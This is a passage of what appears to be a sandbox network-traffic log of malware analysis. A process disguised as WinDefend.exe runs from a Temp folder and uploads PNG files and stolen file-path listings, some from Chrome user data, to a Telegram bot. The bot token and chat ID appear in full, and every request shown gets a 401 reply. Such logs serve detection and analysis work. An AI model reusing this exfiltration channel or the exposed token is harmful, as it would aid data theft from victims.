2024-05-23 13:35:43 UTC	4096	OUT	Data Raw: 89 6d 60 fa 86 c0 8c 22 60 fb f3 33 3a f1 e6 b6 21 50 80 40 1b 2f 11 2e 18 ca 8a 0d 01 43 a0 07 04 f6 2d 18 f3 ec ac 9c fb 71 2f cb d1 79 28 ca 6e 01 8e dd 87 bd 3f da dc 32 a7 3f 16 7d 03 cc fd 5d 23 43 c0 10 18 06 02 b7 81 99 4f 00 6f 0f e6 7f 9f 64 7e 13 f0 da e0 1d c0 46 86 80 21 d0 2c 02 6f 42 77 cf 05 6f 98 d3 2d 9f 8f 7d 09 f8 95 5e dd e1 5e de cd 1e e1 66 a6 48 6f 86 b6 7c 61 2d ef 01 f3 73 40 9f 05 dc 87 db 0e 6c 64 08 18 02 69 20 f0 09 98 f1 f0 02 53 76 2e 28 f7 8b 1f 82 82 3d c1 ff 0c f6 3f 8b fe 86 b2 4b c1 7c b1 f5 0f c0 67 82 a7 79 91 25 9a 1b 0d 11 01 3b f0 3a c4 59 33 9b 0d 01 43 c0 10 30 04 0c 01 43 a0 2f 04 78 ed 74 12 78 77 cf 80 8f 23 ff 7c af cc b2 86 80 21 90 06 02 5b c1 8c 17 a7 61 4a a9 15 af 46 ed 0a f0 af 4a b5 ac d2 10 30 04 0c Data Ascii: m`"`3:!P@/.C-q/y(n?2?}]#COod~F!,oBwo-}^^fHo\|a-s@ldi Sv.(=?K\|gy%;:Y3C0C/xtxw#\|![aJFJ0
2024-05-23 13:35:43 UTC	4096	OUT	Data Raw: ae 1e 81 ba b3 4a ea ad 2a 6d 04 78 af 65 23 f0 bf 81 0f 29 31 95 87 9a 3e 08 e6 e7 fe 3b c0 7c a6 8a 87 5d 45 3c 68 c9 ef f8 a7 80 79 df e6 d9 60 3e 7b 65 d4 1d 02 bc 4e 7b 37 f8 85 01 43 f2 3e db 6f 03 f4 5c 15 ee 95 1f e4 16 78 69 de cf 3f c3 2b b3 6c 9a 08 f0 7e dc e3 c0 ff 0e be 3f f8 33 e0 8b c1 2e f1 de 1c ef eb 50 ef 32 f0 04 fc 2f 60 a3 61 23 f0 1c 98 cf f8 5f 56 e2 c6 5b 72 ea 78 70 32 8f f8 72 03 f6 75 5d 5e a5 95 f5 8e 00 ef b3 1f 07 e6 f7 c2 ae 99 35 77 84 e4 77 ff 8d 59 fe 1b 99 74 c5 1f 91 39 01 4c 5d 7e 4e 4c c0 bf 01 d7 a2 f5 6a b5 b2 46 86 80 21 60 08 18 02 86 80 21 60 08 8c 13 81 87 c1 ad 93 c0 eb 3a ee f1 62 9a 1b af ee 26 8b 53 bd 24 b9 f5 92 5c 3b 99 2e c6 68 c7 72 eb d5 10 e8 16 81 be 0e 8d 9e 0d 37 ef 03 7e 06 f8 68 30 37 ec 62 69 Data Ascii: J*mxe#)1>;\|]E<hy`>{eN{7C>o\xi?+l~?3.P2/`a#_V[rxp2ru]^5wwYt9L]~NLjF!`!`:b&S$\;.hr7~h07bi
2024-05-23 13:35:43 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:43 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
206	192.168.2.5	61257	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:42 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="ba951992-57b2-4f8b-a418-cf89eba89d53" Host: api.telegram.org Content-Length: 4170 Expect: 100-continue
2024-05-23 13:35:43 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:43 UTC	40	OUT	Data Raw: 2d 2d 62 61 39 35 31 39 39 32 2d 35 37 62 32 2d 34 66 38 62 2d 61 34 31 38 2d 63 66 38 39 65 62 61 38 39 64 35 33 0d 0a Data Ascii: --ba951992-57b2-4f8b-a418-cf89eba89d53
2024-05-23 13:35:43 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 39 36 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 39 36 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=96.png; filename*=utf-8''96.png
2024-05-23 13:35:43 UTC	3854	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 60 00 00 00 60 08 06 00 00 00 e2 98 77 38 00 00 0e d5 49 44 41 54 78 9c ed 9c 7b 8c 5c d7 5d c7 bf bf 73 ee 9d d7 ae 1f e3 67 62 1b 3b 0f b7 8e a2 e2 60 af 0d 34 89 df 4d 11 41 89 4c 8c dd 02 12 a5 21 01 1a 89 46 6a 85 40 28 88 29 54 50 a4 2a 44 a5 b5 2b 27 29 45 6d 70 b3 b6 ea 80 10 20 35 7e e4 d5 24 c5 89 13 4a ec 88 18 52 07 bb 38 f6 6e 76 d7 fb 98 c7 3d e7 7c f9 e3 de 99 9d 99 9d 5d ef da b3 3b b3 d1 fd 4a 57 bb 9a fb fe fd ee f9 dc df f9 fd ce b9 40 ac 58 b1 62 c5 8a 15 2b 56 ac 58 b1 62 c5 8a 15 2b 56 ac 58 55 ca 01 aa 1b d0 f5 bf 77 03 3a 07 a8 56 5c 53 3b 88 39 28 76 8f b5 0b bb a1 99 6b 82 5d 08 48 fd 6f dd 40 a2 7b c5 8a 74 fd 76 8d b6 fd b0 8a 84 90 b5 f7 cb 6e a4 df ea 46 a2 e6 37 8c dd Data Ascii: PNGIHDR``w8IDATx{\]sgb;`4MAL!Fj@()TP*D+')Emp 5~$JR8nv=\|];JW@Xb+VXb+VXUw:V\S;9(vk]Ho@{tvnF7
2024-05-23 13:35:43 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 62 61 39 35 31 39 39 32 2d 35 37 62 32 2d 34 66 38 62 2d 61 34 31 38 2d 63 66 38 39 65 62 61 38 39 64 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --ba951992-57b2-4f8b-a418-cf89eba89d53Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:43 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:43 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 62 61 39 35 31 39 39 32 2d 35 37 62 32 2d 34 66 38 62 2d 61 34 31 38 2d 63 66 38 39 65 62 61 38 39 64 35 33 2d 2d 0d 0a Data Ascii: --ba951992-57b2-4f8b-a418-cf89eba89d53--
2024-05-23 13:35:43 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:43 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
207	192.168.2.5	61258	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:43 UTC	235	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="32b1706f-6542-42b1-8fab-42ac39adac32" Host: api.telegram.org Content-Length: 130574 Expect: 100-continue
2024-05-23 13:35:43 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:43 UTC	40	OUT	Data Raw: 2d 2d 33 32 62 31 37 30 36 66 2d 36 35 34 32 2d 34 32 62 31 2d 38 66 61 62 2d 34 32 61 63 33 39 61 64 61 63 33 32 0d 0a Data Ascii: --32b1706f-6542-42b1-8fab-42ac39adac32
2024-05-23 13:35:43 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 39 30 36 36 37 34 35 66 66 34 34 62 36 38 39 62 35 63 63 38 39 63 33 64 37 33 39 37 30 66 30 31 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 39 30 36 36 37 34 35 66 66 34 34 62 36 38 39 62 35 63 63 38 39 63 33 64 37 33 39 37 30 66 30 31 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=9066745ff44b689b5cc89c3d73970f01.png; filename*=utf-8''9066745ff44b689b5cc89c3d73970f01.png
2024-05-23 13:35:43 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 c2 00 00 02 1c 08 06 00 00 00 d5 1d dd 05 00 00 80 00 49 44 41 54 78 da ec bd 07 5c 15 57 bb 35 ee f7 fd ef bd ff 7b ef db df 37 79 d3 34 31 c6 24 1a a3 49 34 c6 16 63 8b bd 83 5d 51 11 94 26 0a 82 05 7b ef 0d ec 05 bb a2 58 c0 86 d8 15 01 91 2a bd f7 7a 38 bd d1 71 7d f3 cc e1 28 1a 35 0a 68 14 9f f5 fb 2d 8f 9c 32 b3 67 cf 9e d9 7b d6 7e f6 7a 1a 14 16 16 82 c9 64 32 99 4c 26 93 c9 64 32 99 4c 26 93 c9 64 32 99 cc fa ca 06 e9 e9 e9 88 8d 8d 65 32 99 cc a7 32 26 26 86 eb 81 c9 e4 6b 8c c9 64 32 99 4c 26 93 c9 64 32 99 cc b7 9a 0d e8 9f 5b b7 6e 31 99 4c 26 93 c9 64 32 99 4c 26 93 c9 64 32 99 4c 26 93 59 2f f9 50 08 0f 09 09 e1 99 01 26 93 f9 58 94 6a 7c 7c 3c d2 d2 d2 40 2b 47 98 4c e6 ab 63 62 62 Data Ascii: PNGIHDRIDATx\W5{7y41$I4c]Q&{X*z8q}(5h-2g{~zd2L&d2L&d2e22&&kd2L&d2[n1L&d2L&d2L&Y/P&Xj\|\|<@+GLcbb
2024-05-23 13:35:43 UTC	4096	OUT	Data Raw: 2b 5a 0e 53 24 ba b1 4c 4f 0a 85 34 76 a7 e7 64 0a 44 a4 15 a9 75 21 84 6f 49 92 a2 41 f8 13 d1 e0 f7 05 06 97 a2 81 47 38 1a ec 0f f8 7d 21 dc 3d 10 23 7c 23 50 48 41 6d 6f d0 58 9c 26 37 e8 39 8c 02 f1 26 4c 98 20 6a 82 2f ca 91 23 47 8a e7 82 9e 9b de 44 21 9c 26 4c e8 f8 9e f6 ec 43 ed 92 b4 dd b7 49 08 37 26 8b a5 76 4e da 50 8b 16 2d 44 6d 88 9e f5 ea 3a 39 6c ad 85 70 2a 64 5a 5a 1a ce 9d 3b 27 5e 88 5e 5e 5e 2f 44 fa 2e 09 d2 d4 28 eb 62 16 ed 79 0d 9f 96 98 50 b4 1e 45 82 57 17 c1 69 bf f4 39 d1 e8 af f4 34 31 9c de 7f 99 c8 f5 97 16 c2 a5 72 e8 f4 f9 b8 b0 6d 16 cc ec b7 23 4b 57 8e f2 d2 12 e8 28 62 4e 8c 0e 16 f6 af 90 20 de ef 22 0e 6e dd 02 d7 ad db 71 de 2f 14 52 b5 4a 38 06 25 f2 93 c3 71 ee 8c 0f fc 23 02 71 e2 c0 4e 6c da ba 0b e7 82 93 Data Ascii: +ZS$LO4vdDu!oIAG8}!=#\|#PHAmoX&79&L j/#GD!&LCI7&vNP-Dm:9lp*dZZ;'^^^^/D.(byPEWi941rm#KW(bN "nq/RJ8%q#qNl
2024-05-23 13:35:43 UTC	4096	OUT	Data Raw: 85 f0 94 1b 07 60 6b e3 8c 2b c9 54 9f 0a b1 3e a3 bd d6 63 fc 64 27 5c 0f 0b c0 02 cb 49 d8 22 1c 5f 49 19 f9 e9 0a db 8e 3e 8f 69 55 42 38 b4 d9 38 b0 cc 02 33 b6 5f 81 4c 5d 04 79 3d 13 c2 45 9d 59 b8 76 48 04 27 ab 13 4a da 47 93 53 bf d1 95 cb cb c5 d9 76 12 ec 28 8a 9c bc 8c 5f 5c 94 4e c3 c2 01 bf a0 4d 97 41 b0 30 9f 88 89 93 c6 a2 e3 57 cd 30 c0 76 2b 14 55 d1 c8 ab 6c fa 60 b8 cb 6e 5c b9 72 45 e4 71 b7 79 e8 d3 f7 67 b8 5d cf 16 7e 9f 08 bb de 7d e0 72 f0 c5 f7 a9 88 39 8d c1 df b4 c4 af 23 cc c4 7b c4 c4 71 03 d1 fc e3 56 58 70 c2 20 be df 72 9b 8a 7e 63 57 c3 58 6b 91 c7 66 a3 8b c9 52 14 92 65 4a c0 6e 8c 18 65 8b d0 87 2e 2c 79 58 3b 79 10 ba 0c b6 c1 f2 25 8b c4 a4 2d 4b 16 3a 62 f0 a0 61 d8 7d f5 2e b6 4f 33 45 d7 21 d6 8f 7f 36 60 20 b6 Data Ascii: `k+T>cd'\I"_I>iUB883_L]y=EYvH'JGSv(_\NMA0W0v+Ul`n\rEqyg]~}r9#{qVXp r~cWXkfReJne.,yX;y%-K:ba}.O3E!6`
2024-05-23 13:35:43 UTC	4096	OUT	Data Raw: 9c 3c 72 48 04 1f 37 6e 9c 68 d3 40 37 37 4a 8c 49 33 6a e4 c9 44 a2 2e f9 cf 50 f9 28 42 fc 65 1b 4d 4d ac 51 a4 32 05 24 39 a9 b8 76 e6 38 5c 37 6f c6 a6 4d 9b e0 79 e6 3a b2 a5 1a d1 57 5b a9 92 21 d2 ff 02 f6 b9 6e c2 46 e1 b3 ed 1e a7 10 16 93 25 94 4d 83 82 e4 50 9c 3a 76 1c f7 92 f3 a0 90 2b a0 92 e7 20 c0 c7 13 87 ce 05 40 22 95 8b d1 e5 19 31 01 38 b6 d7 03 11 79 6a 64 05 78 c0 6a fc 18 cc 5e b9 09 5b c8 ba e1 66 30 f2 69 b9 81 42 0e 99 f0 9a 9b 1d 01 0f f7 cd 38 78 21 10 05 0a 1d d4 05 e9 f0 3f 77 04 3b 36 6d c4 e6 cd 6e 38 7d f5 1e 32 e5 5a 68 f3 53 e0 7b fa 80 f0 9e ab 68 7b e1 e6 ba 15 5e 17 03 90 2a 55 8a 16 2f b2 87 91 84 2a 28 24 29 b8 ed b1 17 6e c2 85 b8 65 f7 01 f8 47 93 97 95 c1 57 5c a1 56 21 2f e3 3e ce ec db 85 4d eb 37 60 b3 fb 3e Data Ascii: <rH7nh@77JI3jD.P(BeMMQ2$9v8\7oMy:W[!nF%MP:v+ @"18yjdxj^[f0iB8x!?w;6mn8}2ZhS{h{^U/($)neGW\V!/>M7`>
2024-05-23 13:35:43 UTC	4096	OUT	Data Raw: 36 57 4c 84 96 5c 58 ce 15 c4 78 67 a1 2f 7d 00 fb e3 ca 47 16 28 b6 39 a2 f0 47 ab 25 5c 6f 68 b9 82 18 ef 34 ae 27 94 e0 cb 05 bf ed 3b 7e dd 24 45 b6 82 fb 0e 06 83 c1 60 d4 2f 90 37 38 89 c1 5b b7 6e 45 65 65 65 ad b7 f7 a0 a2 14 25 a5 25 28 29 29 41 69 59 39 48 c2 93 25 de c1 be 3d fb e0 1f 27 79 a3 8e fd d4 a9 53 b0 b4 b4 14 3d c3 4b 4b eb 36 59 7c 1d 09 e1 95 b8 b2 c1 06 4d ff f4 37 bc ff c1 7b f8 cb 9f ff 8c 3f fd e9 4f f8 f3 df ff 89 86 4d be 46 37 93 f1 38 1d 95 fb d6 37 c2 07 da 7c 78 ce b1 84 e9 c8 a1 38 1e a9 fe c3 ca 51 94 74 16 23 da ff 1b 7f fe 67 4b 6c ba f8 c7 1a e5 17 06 9d c7 1c 93 2e 98 b8 78 23 32 8a f9 46 c5 60 30 18 8c 17 43 7c 5e 39 a6 9f 50 62 c8 0e 19 06 0b 9c 7f 56 8d 5c 25 2f 6b 67 30 2a 84 cb 80 12 03 0e db 25 17 93 63 8e 71 Data Ascii: 6WL\Xxg/}G(9G%\oh4';~$E`/78[nEeee%%())AiY9H%='yS=KK6Y\|M7{?OMF787\|x8Qt#gKl.x#2F`0C\|^9PbV\%/kg0*%cq
2024-05-23 13:35:43 UTC	4096	OUT	Data Raw: 3d fb 2d 7e f5 5c 6b e2 fb ff c8 65 47 54 31 42 84 22 e7 94 8d 6a d3 c8 3e 1d be d0 f6 ef db 67 3b b6 ec b0 fd 29 e7 8b b8 d3 3c 1b df ac 8a f5 98 94 a0 fa 15 42 08 51 6a 58 be 7c b9 55 af 5e dd ba 76 ed 6a e7 ce 9d 2b ec 07 ab 6d 99 d9 d7 6a 54 ab 69 7d 26 af b0 a4 8b 57 db 70 02 34 0e af 1c 63 f5 eb 34 b4 29 57 26 8c 77 2e 18 6a b5 aa d5 b2 91 8b bd cf cd 6c 5b 39 ae a7 d5 ae dd c2 16 c6 27 17 64 6b c8 48 dd 6f a3 3b d5 b5 0f 9a 7c 61 2b d7 2d b6 ce 0d 6b 5a d3 7e df da d9 62 3a ff ec ec 6c 27 c0 59 30 74 c2 84 09 c5 5a b7 d7 61 b1 cc e1 76 fe ca ef be 1f d4 c0 1e ba e3 47 f6 e0 5f 2a d9 ec dd f9 0b 5b e6 24 af b7 3a 15 ff c3 7e 79 ff 1f ad e3 ec bd a1 6f 1e 36 4f b4 97 1e ba c3 ee 7c a8 9c f5 9e e3 b7 7a e9 c1 39 f6 dc a3 01 22 7c ed 30 7b e4 bf ee 76 Data Ascii: =-~\keGT1B"j>g;)<BQjX\|U^vj+mjTi}&Wp4c4)W&w.jl[9'dkHo;\|a+-kZ~b:l'Y0tZavG_*[$:~yo6O\|z9"\|0{v
2024-05-23 13:35:43 UTC	4096	OUT	Data Raw: d6 a0 ab c5 9f dc 67 e3 3f ab 6f 2d 1a b5 b4 16 9f d4 b2 16 cd fb da b1 6c b3 e3 9b be b6 f6 b5 eb 5a 9b e6 cd ed e3 0f de b3 c1 93 36 99 02 5a 45 69 23 79 dd 58 ab d7 a1 a7 25 05 dc b3 64 1c 59 61 ed 9a b6 b2 b5 27 f2 7f 3e bd 7f b9 75 6b 5c db ea 37 69 6a 2d 3a 0e b1 c5 bb 53 cd b2 f6 59 c7 f7 5f b4 7f d4 6d 61 9d 9a b4 b0 3e a3 e7 da 85 9c 5c 3b ba 7c aa b5 fe a0 ae 35 6f d6 cc 9a d6 a9 6f d3 d6 b0 93 34 1b d5 b1 81 0d 5d 76 d4 ed 2f fb fc 11 9b d8 e3 13 fb b0 7e 13 6b da a2 ab 0d 9a b3 db 2e 5f 96 08 17 a5 80 f4 44 1b 37 b8 95 35 6a d9 cc 5a 7d d2 d2 3a 76 1b 68 71 49 24 d6 bc 64 6b bf e9 65 75 3f ac 6f 9f 7c d2 da 3a 0d 5b e6 26 98 f6 cd ed 63 cd bb 4f b8 22 c2 0f 58 ef 16 1f d9 b4 ed 3c 79 9b 61 2b 27 7c 66 cd 3f 6c ec fb 5c 69 66 1f 55 af 6b f3 37 Data Ascii: g?o-lZ6ZEi#yX%dYa'>uk\7ij-:SY_ma>\;\|5oo4]v/~k._D75jZ}:vhqI$dkeu?o\|:[&cO"X<ya+'\|f?l\ifUk7
2024-05-23 13:35:43 UTC	4096	OUT	Data Raw: 9f 92 af 9d 1c b5 9b 37 6f 2e f8 1d 91 ce 44 d5 53 16 f6 d5 b9 73 67 37 e9 10 2c 62 91 df 2d 5f be dc 2d 8c ca 6b 91 c0 4c f6 84 9a 44 09 07 29 82 88 a8 a6 5d a9 0b 22 fd 99 e4 88 24 95 59 6c 0e a1 7a ee dc b9 ab 6e 9e c6 8c 19 e3 f6 d5 b2 65 4b 57 bf a4 19 0a b5 2f ea aa 71 e3 c6 ee b8 a4 2b 62 dc f1 e4 85 d7 e6 f4 07 ca e6 7d 37 e2 5f ca c7 fe 91 4b b0 77 ef 5e 37 9e c9 fd 5f 18 82 89 70 72 8f cf 99 33 c7 3a 75 ea e4 ea 97 7f 29 6b 72 72 72 54 df e7 18 1b 9b 36 6d 72 e3 82 76 66 1f 9f 7d f6 99 cd 9e 3d 3b ea eb 01 fd 7b ed da b5 6e b1 dd a6 4d 9b ba fa 64 f1 5b d6 03 40 a6 15 e6 fb 22 d7 3c 52 c8 d0 5f 39 c7 c5 8b 17 bb 3e c4 98 a3 8c 8c 19 ce 93 c9 c0 58 a1 8d 39 e7 c0 31 15 2e 05 55 a4 31 c5 79 33 a6 c8 1f 1f 29 97 33 93 83 d4 b5 ff e2 87 8c 13 ee e3 Data Ascii: 7o.DSsg7,b-_-kLD)]"$YlzneKW/q+b}7_Kw^7_pr3:u)krrrT6mrvf}=;{nMd[@"<R_9>X91.U1y3)3
2024-05-23 13:35:44 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:44 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
208	192.168.2.5	61259	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:44 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 349 Expect: 100-continue
2024-05-23 13:35:44 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:44 UTC	349	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 31 32 38 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 Data Ascii: chat_id=1655240967&text=File%3A+128.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applica
2024-05-23 13:35:44 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:44 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
209	192.168.2.5	61260	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:44 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 251 Expect: 100-continue
2024-05-23 13:35:44 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:44 UTC	251	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 61 69 63 5f 66 69 6c 65 5f 69 63 6f 6e 73 5f 68 69 43 6f 6e 74 72 61 73 74 5f 77 6f 62 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 66 69 6c 65 5f 74 79 70 65 73 25 35 43 68 69 5f 63 6f 6e 74 72 61 73 74 25 35 43 61 69 63 5f 66 69 6c 65 5f 69 63 6f 6e 73 5f 68 69 43 6f 6e 74 72 61 73 74 5f 77 6f 62 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 35 30 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+aic_file_icons_hiContrast_wob.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cfile_types%5Chi_contrast%5Caic_file_icons_hiContrast_wob.png%0ASize%3A+50+KB
2024-05-23 13:35:44 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:44 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
210	192.168.2.5	61261	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:44 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 257 Expect: 100-continue
2024-05-23 13:35:45 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:45 UTC	257	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 39 32 62 66 62 36 38 61 64 62 35 34 61 36 65 63 39 35 30 31 39 36 62 34 64 33 39 63 63 66 33 65 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 39 32 62 66 62 36 38 61 64 62 35 34 61 36 65 63 39 35 30 31 39 36 62 34 64 33 39 63 63 66 33 65 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 32 39 2b Data Ascii: chat_id=1655240967&text=File%3A+92bfb68adb54a6ec950196b4d39ccf3e.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5C92bfb68adb54a6ec950196b4d39ccf3e.png%0ASize%3A+29+
2024-05-23 13:35:45 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:45 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
211	192.168.2.5	61262	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
